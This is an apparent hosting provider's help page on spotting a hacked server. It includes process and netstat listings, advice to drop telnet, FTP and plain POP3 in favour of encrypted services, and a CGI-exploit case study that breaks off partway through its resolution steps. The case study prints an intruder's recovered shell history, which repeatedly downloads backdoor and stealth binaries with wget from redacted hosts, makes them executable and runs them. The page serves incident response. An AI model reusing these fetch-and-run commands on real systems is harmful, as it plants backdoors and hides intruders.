|
Search |
It doesn't only happen to others. How to see that a machine is hacked? By having a look at MRTG, you can't go wrong:   And on the machine, we find: root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 [...] root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 Obviously, the hacker has been able to launch softs in root. The machine is thus hacked and must be re-installed. # netstat -tanpu Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc # ps auxw | grep 28823 root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823 It exist launched softs, which have a pid and that are not seen by ps, surely due to the fact that ps has been replaced by a hacked ps that filters all softs of the hacker in order to trick the eye. # halt Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003... The system is going down for system halt NOW !! We immediately stop the machine. We can have the chance to have a SemiHackedMachine. An other experience: HackedMachineExample.. Why is the machine hacked? The origin of the problems are multiple, but we can sum up it as follows: you are not paranoid. You use telnet. Your login and password travel via Internet and they can be 'stolen' at any time. You must use SSH. Here is a manual about it: SshOnDedicated. You use FTP, your login and password travel on Internet and it's the same root password. Sftp is your solution. You use pop3/imap with the password and it's the root password. Use APOP or POP3S/IMAPS. Here is a manual about it: SmtpPop3Imap. If you don't update your server with releases ReleasePatch, your risk easy hack (about 250 scans are carried out a day on our network in order to detect security faults). What to do? Once the machine is hacked, there is only one efficient solution left: to reinstall it. The price is £90 + VAT and you restart with a re-setup release on a new disk. If the box allows it, we will put the previous disk in secondary and we mount it on /mmt (for 10 days). Hack examples 1. CGI script fault Symptoms A g00dies.tgz file uploaded in /tmp with other files: x, k, etc... The x program is a backdoor, if it's launched, it gives access to the server. We have found the bash.history of nobody user in /tmp, here is the content: cd /tmp wget www.#######.com/x chmod +x x ./s ./x ./x ./x ./x./x ./x ./x ./x ./x wget www.#######.com/k chmod +x k ./k -d; /tmp/x ./x ./x ./x ./x ./x ./x ./ cd /tmp mkdir ., cd ., wget ######.go.ro/vampix tar zxvf vampix cd esc ./mingetty ./mingetty ./mingetty cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp cd /tmp wget ######.go.ro/smth chmod +x smth ./smth cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp /tmp/smth /tmp/stealth Comments Thanks to it, we can notice that commands have been placed as nobody, but this user is mainly used by Apache. It looks like the hacker benefited from a vulnerability of a CGI script. Resolution - Killer all suspected process in progress. The hacker is obviously not in root (it could actually benefit from a kernel default <2.4.24); However, we make some basic operations/verifications:
- Consult then Apache logs at about the time the hack happened to find the suspected script. |
